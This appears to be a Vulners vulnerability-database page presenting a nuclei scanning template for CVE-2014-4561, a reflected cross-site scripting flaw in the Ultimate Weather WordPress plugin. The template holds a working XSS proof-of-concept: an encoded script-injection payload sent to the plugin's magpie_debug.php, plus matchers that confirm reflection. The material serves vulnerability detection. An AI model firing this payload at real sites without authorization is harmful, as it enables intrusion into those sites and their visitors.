Lucene search
K

Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting vulnerability in WordPres

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
WordPress ultimate-weather cross-site scripting vulnerability
14 Jan 202000:00
cnvd
CVE
CVE-2014-4561
10 Jan 202013:02
cve
Cvelist
CVE-2014-4561
10 Jan 202013:02
cvelist
EUVD
EUVD-2014-4488
10 Jan 202013:02
euvd
NVD
CVE-2014-4561
10 Jan 202014:15
nvd
Prion
Cross site scripting
10 Jan 202014:15
prion
RedhatCVE
CVE-2014-4561
22 May 202513:38
redhatcve
wpexploit
Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
25 Apr 201400:00
wpexploit
WPVulnDB
Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
25 Apr 201400:00
wpvulndb
id: CVE-2014-4561

info:
  name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the plugin's output, potentially leading to the execution of arbitrary code or stealing sensitive information.
  remediation: |
    Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
    - https://nvd.nist.gov/vuln/detail/CVE-2014-4561
    - http://codevigilant.com/disclosure/wp-plugin-ultimate-weather-plugin-a3-cross-site-scripting-xss/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2014-4561
    cwe-id: CWE-79
    epss-score: 0.03686
    epss-percentile: 0.88224
    cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "ultimate-weather_project"
    product: "ultimate-weather"
    framework: wordpress
  tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Ultimate Weather'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c743ce33222f95963ac03a89661559759ddb7e157034bc5d11ff0c2b734ce35d022100b3033bddc5273bb819c0461419e5e1cdb698c158ca4f9309ec719097df235c94:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 24.3
CVSS 3.16.1
EPSS0.03686
15